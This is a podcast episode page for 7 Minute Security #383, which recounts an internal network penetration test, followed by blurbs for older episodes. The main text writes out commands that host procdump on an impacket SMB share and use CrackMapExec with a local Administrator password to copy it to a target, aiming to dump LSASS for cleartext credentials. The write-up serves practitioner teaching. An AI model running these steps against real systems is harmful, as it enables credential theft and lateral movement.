7MS #383: Tales of Internal Network Pentest Pwnage - Part 10
7 Minute Security1 Okt 2019

7MS #383: Tales of Internal Network Pentest Pwnage - Part 10

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

  • Relayed one high-priv cred from one box to another
  • Dumped and cracked a local machine's hash
  • Passed that hash around the network
  • Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
  • Set the wdigest flag via CrackMapExec

Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share

Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)

Avsnitt(684)

7MS #107: I'm Going to PWAPT!

7MS #107: I'm Going to PWAPT!

Hey I'm going to PWAPT this week (http://www.eventbrite.com/e/practical-web-application-penetration-testing-with-tim-tomes-lanmaster53-tickets-16718889649), so in this episode I talk about that...and how I'll probably be too info-overloaded to record anything on Thursday :-). Oh, and I had a fun Web app pentest this week that I wanted to share some fun bits on.

3 Nov 20157min

7MS #106: A Day in the Life of an Information Security Analyst

7MS #106: A Day in the Life of an Information Security Analyst

A listener wrote in asking some questions about "a day in the life of" a security analyst, so here's my best stab at it!

30 Okt 201510min

7MS #105: OFFTOPIC-Big Bag of Random Sauce

7MS #105: OFFTOPIC-Big Bag of Random Sauce

Today's totally random episode covers: 1. How bad does this podcast's logo suck? 2. Does this podcast need a theme song? 3. Some interesting training I'm taking next week. 4. The Walking Dead - who should die? 5. Metal Gear Solid and my personal godmode strategy.

28 Okt 20159min

7MS #104: LANTurtle First Impressions

7MS #104: LANTurtle First Impressions

Hey I just got a LANTurtle and....these are my first impressions!

22 Okt 20157min

7MS #103: OFFTOPIC-I Was in a Movie Once

7MS #103: OFFTOPIC-I Was in a Movie Once

This is an off-topic episode about the time I was in the holiday comedy super-smash laugh-fest, Jingle All the Way.

20 Okt 20157min

7MS #102: Recon-ng!

7MS #102: Recon-ng!

I'm a big fan of Recon-ng and you should be too! Check it out - and learn more about Tim Tomes, its creator - at www.lanmaster53.com. And here's the video I mentioned in the podcast - my first look at Recon-ng in action: https://www.youtube.com/watch?v=vkmNTNl6urw

15 Okt 20158min

7MS #101: OFFTOPIC-I Am Chris Farley

7MS #101: OFFTOPIC-I Am Chris Farley

The new(ish) Chris Farley documentary is fantastic - see it!

14 Okt 20157min

7MS #100: Assessment Curses Can Be Blessings

7MS #100: Assessment Curses Can Be Blessings

Ever had an assessment that you thought would be the death of you? I had one recently, but after sticking it out, it turned out to be a blessing in disguise.

9 Okt 20157min

Populärt inom Politik & nyheter

p3-krim
svd-dokumentara-berattelser-2
rss-krimstad
flashback-forever
rss-viva-fotboll
olyckan-inifran
aftonbladet-daily
rss-vad-fan-hande
rss-sanning-konsekvens
svenska-fall
krimmagasinet
rss-expressen-dok
motiv
fordomspodden
svd-nyhetsartiklar
dagens-eko
rss-frandfors-horna
blenda-2
spar
spotlight